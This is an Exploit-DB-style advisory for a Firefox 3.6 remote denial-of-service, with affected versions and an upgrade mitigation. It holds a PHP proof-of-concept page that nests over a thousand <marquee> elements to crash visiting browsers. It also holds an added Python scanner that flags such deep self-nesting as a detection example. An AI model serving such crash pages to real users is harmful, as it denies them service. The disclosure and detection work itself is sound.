Vendor: Firefox
By: Ale46
CVSS: 7.5 (HIGH)
Remote Denial Of Service
CWE
Product Name: Firefox
Affected Version From: 3.6
Affected Version To: 3.6
Patch Exists: NO
Related CWE:
CPE: a:mozilla:firefox:3.6
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 x32/x64, Ubuntu 9.10 x32
2010

Mozilla Firefox <=3.6 - Remote Denial Of Service Exploit

Visiting this PHP page causes an instant crash of Firefox.

Mitigation:

Upgrade to a version higher than 3.6.

Exploit-DB raw data:

<?php

/*
*    Title: Mozilla Firefox <=3.6 - Remote Denial Of Service Exploit
*    Date: 25/02/10
*    Author: Ale46 - ale46[at]paranoici[dot]org
*    Software Link: http://www.mozilla-europe.org/en/firefox/
*    Version: 3.6 and 3.5.8 are vulnerable so I think that all versions <= 3.6 have the same issue
*    Tested on: Windows 7 x32\x64 - Ubuntu 9.10 x32
*    Description: visiting this php page you'll get an instant crash of Firefox
*    Greetz: Gandalf
*    Extra Greetz: University of Palermo and its fantastic rules for the Computer Engineering degree (how beautiful is irony)
*/

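// Opening and closing halves of a chain of nested <marquee> elements.
$a = '<marquee>';
$b = '</marquee>';

// Add 1,001 more levels on top of the initial one.
for ($i = 0; $i <= 1000; $i++) {
    $a .= '<marquee>';
    $b .= '</marquee>';
}

// Emit the nested elements around a single text node.
echo '<body>';
echo $a;
echo "hadouken!";
echo $b;
echo '</body>';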

?>
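
A detection-side check for the payload shape above, as an added example that is not part of the original entry: it uses Python's standard `html.parser` to measure how deeply any one element is nested inside itself and reports tags above a threshold. The threshold of 100, the names `NestingScanner` and `scan`, and both sample strings are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Assumed threshold, not from the page: tune it against your own traffic.
MAX_SAME_TAG_DEPTH = 100

# Void elements never have a closing tag, so they cannot nest.
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "source", "track", "wbr"}


class NestingScanner(HTMLParser):
    """Record, per tag, the most instances that were open at the same time."""
    def __init__(self):
        super().__init__()
        self.stack = []       # currently open tags, outermost first
        self.open_count = {}  # tag -> instances currently open
        self.deepest = {}     # tag -> highest open_count seen

    def handle_starttag(self, tag, attrs):
        if tag in VOID:
            return
        self.stack.append(tag)
        n = self.open_count[tag] = self.open_count.get(tag, 0) + 1
        self.deepest[tag] = max(n, self.deepest.get(tag, 0))

    def handle_endtag(self, tag):
        if not self.open_count.get(tag):
            return  # stray close tag with nothing to match
        while self.stack:  # pop to the nearest matching open tag
            closed = self.stack.pop()
            self.open_count[closed] -= 1
            if closed == tag:
                break


def scan(html, limit=MAX_SAME_TAG_DEPTH):
    """Return {tag: depth} for each tag nested inside itself beyond limit."""
    parser = NestingScanner()
    parser.feed(html)
    parser.close()
    return {t: d for t, d in parser.deepest.items() if d > limit}


# Constructed samples, not captured traffic. DEEP has the same 1,002-level
# <marquee> nesting that the PHP loop on this page emits.
BENIGN = "<body><div><marquee>news</marquee><br><p>text</p></div></body>"
DEEP = "<body>" + "<marquee>" * 1002 + "x" + "</marquee>" * 1002 + "</body>"
if __name__ == "__main__":
    print(scan(BENIGN), scan(DEEP))
```

The scanner counts a tag as open until it sees a matching close, so markup that omits optional end tags (long runs of unclosed `<p>` or `<li>`) is counted as nested; a full HTML5 tree builder would close those implicitly.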